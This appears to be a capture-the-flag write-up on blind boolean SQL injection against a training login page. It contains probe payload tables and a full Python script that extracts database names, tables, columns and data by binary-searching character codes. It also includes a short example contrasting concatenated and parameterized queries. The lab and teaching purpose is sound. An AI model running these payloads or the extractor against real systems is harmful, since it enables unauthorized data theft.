Determine whether SQL injection is possible
Log in with ' and '1' = '1 appended
-> Given: ID: normaltic, PW: 1234
-> True (1=1) and False (1=2) must be distinguishable
-> If a True (1=1) value is entered but the result is False
-> Not possible
| Payload | Result |
|---|---|
| normaltic' and '1' = '1 | True |
| normaltic' and '1' = '2 | False |
Log in with normaltic' and (1=1) and '1' = '1
-> Additional check of whether a function can be inserted
-> True/False test
-> Change (1=1) -> (1=2) and try logging in again
| Payload | Result |
|---|---|
| normaltic' and (1=1) and '1' = '1 | True |
| normaltic' and (1=2) and '1' = '1 | False |
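As an added example (not part of the original write-up), the True/False probe pair above is run against an in-memory SQLite stand-in for the lab's login query, first with string concatenation and then with a parameterized query; the table name, column names and the SQLite back end are assumptions. It shows why the pair is distinguishable in one form and not in the other.

```python
import sqlite3

# Constructed stand-in for the lab's login table (schema assumed).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id TEXT, pw TEXT)")
conn.execute("INSERT INTO users VALUES ('normaltic', '1234')")

# The exact probe pair from the write-up.
TRUE_PROBE = "normaltic' and (1=1) and '1' = '1"
FALSE_PROBE = "normaltic' and (1=2) and '1' = '1"


def login_concat(user_id, password):
    """Vulnerable form: input is spliced into the SQL text, so the
    condition carried inside the probe is evaluated by the database."""
    sql = f"SELECT 1 FROM users WHERE id = '{user_id}' AND pw = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_param(user_id, password):
    """Hardened form: placeholders keep the whole probe inside the id
    value, so it is compared as a string and never evaluated."""
    sql = "SELECT 1 FROM users WHERE id = ? AND pw = ?"
    return conn.execute(sql, (user_id, password)).fetchone() is not None


def probes_distinguishable(login):
    """The write-up's criterion: injection is possible only when the
    True probe and the False probe lead to different outcomes."""
    return login(TRUE_PROBE, "1234") != login(FALSE_PROBE, "1234")


if __name__ == "__main__":
    for name, fn in (("concat", login_concat), ("param", login_param)):
        print(name, "True probe:", fn(TRUE_PROBE, "1234"),
              "False probe:", fn(FALSE_PROBE, "1234"),
              "distinguishable:", probes_distinguishable(fn))
```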
Filtering test
Log in with ((select 'test')='test') inserted
-> ((select 'test')='test') is True
-> If the login succeeds, select is not filtered
| Payload | Result |
|---|---|
| normaltic' and ((select 'test')='test') and '1' = '1 | True |
Check by inserting a function
Test with substr()
-> Log in with normaltic' and (substr(('test'),1,1)='t') and '1' = '1
| Payload | Result |
|---|---|
| normaltic' and (substr(('test'),1,1)='t') and '1' = '1 | (see screenshot) |
Check the difference between the True and False responses with Burp Suite
| Burp Suite request |
|---|
| True: normaltic' and (1=1) and '1' = '1 |
| False: normaltic' and (1=2) and '1' = '1 |
- Test sending the request by POST with Python's requests module
- Set keyword to a word that appears only in the False (failed login) response
- If Success is printed, it worked
```python
import requests

url = "http://ctf.segfaulthub.com:7777/sqli_3/login.php"

while True:
    # Probe: True when the first character of the database name has an ASCII code > 0
    data = {
        'UserId': "normaltic' and (ascii(substr((select database()),1,1))>0) and '1' = '1",
        'Password': '1234',
        'Submit': 'Login'
    }
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36',
        'Cookie': 'PHPSESSID=etm5c06rr53pc2js0gemnsi097'
    }
    response = requests.post(url, data=data, headers=header)
    keyword = "Warning!"  # appears only in the False (failed login) response
    if keyword in response.text:
        print("Fail")
        break
    else:
        print("Success")
        break
```
```python
import requests

url = "http://ctf.segfaulthub.com:7777/sqli_3/login.php"

# Choose which query to extract character by character
cho = input("1: Database 2: Table 3: Column 4: Extract ")
if cho == "1":
    ice = "select database()"
elif cho == "2":
    DB = input("DB_Name: ")
    tc = "table"
    ice = f"select {tc}_name from information_schema.{tc}s where table_schema = '{DB}'"
elif cho == "3":
    DB = input("DB_Name: ")
    tc = "column"
    ice = f"select {tc}_name from information_schema.{tc}s where table_schema = '{DB}'"
elif cho == "4":
    Table = input("Table_Name: ")
    Col = input("Column_Name: ")
    ice = f"select {Col} from {Table}"

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36',
    'Cookie': 'PHPSESSID=etm5c06rr53pc2js0gemnsi097'
}
keyword = "Warning!"  # appears only in the False (failed login) response

limit_num = 0   # row index (LIMIT offset)
codes = []      # ASCII codes recovered for the current row

while True:
    # Does row limit_num exist at all? (first character has ASCII code > 0)
    data = {
        'UserId': f"normaltic' and (ascii(substr(({ice} limit {limit_num},1),1,1))>0) and '1' = '1",
        'Password': '1234',
        'Submit': 'Login'
    }
    response = requests.post(url, data=data, headers=header)
    if keyword in response.text:
        print("갯수: " + str(limit_num))   # "count": number of rows
        break

    digit_num = 1   # character position within the row
    while True:
        # Does character digit_num exist? If not, the row is complete
        data = {
            'UserId': f"normaltic' and (ascii(substr(({ice} limit {limit_num},1),{digit_num},1))>0) and '1' = '1",
            'Password': '1234',
            'Submit': 'Login'
        }
        response = requests.post(url, data=data, headers=header)
        if keyword in response.text:
            print("자릿수: " + str(digit_num))   # "length": characters in this row
            res = ''
            for i in codes:
                res = res + chr(i)
            print(codes)
            print(">" + str(res))
            codes = []
            break

        # Binary search for the ASCII code of this character (printable range)
        start = 32
        end = 127
        while start <= end:
            mid = round((start + end) / 2)
            data = {
                'UserId': f"normaltic' and (ascii(substr(({ice} limit {limit_num},1),{digit_num},1))>{mid}) and '1' = '1",
                'Password': '1234',
                'Submit': 'Login'
            }
            response = requests.post(url, data=data, headers=header)
            if keyword in response.text:
                # False: code <= mid
                end = mid - 1
                g = 1
            else:
                # True: code > mid
                start = mid + 1
                g = 2
        # The last branch taken decides whether the answer is mid or mid+1
        if g == 1:
            codes.append(mid)
        else:
            codes.append(mid + 1)
        digit_num += 1
    limit_num += 1

print("Done")
```
| Result screenshots |
|---|
| DB_NAME |
| Table_Name & Column_Name |
| Extract |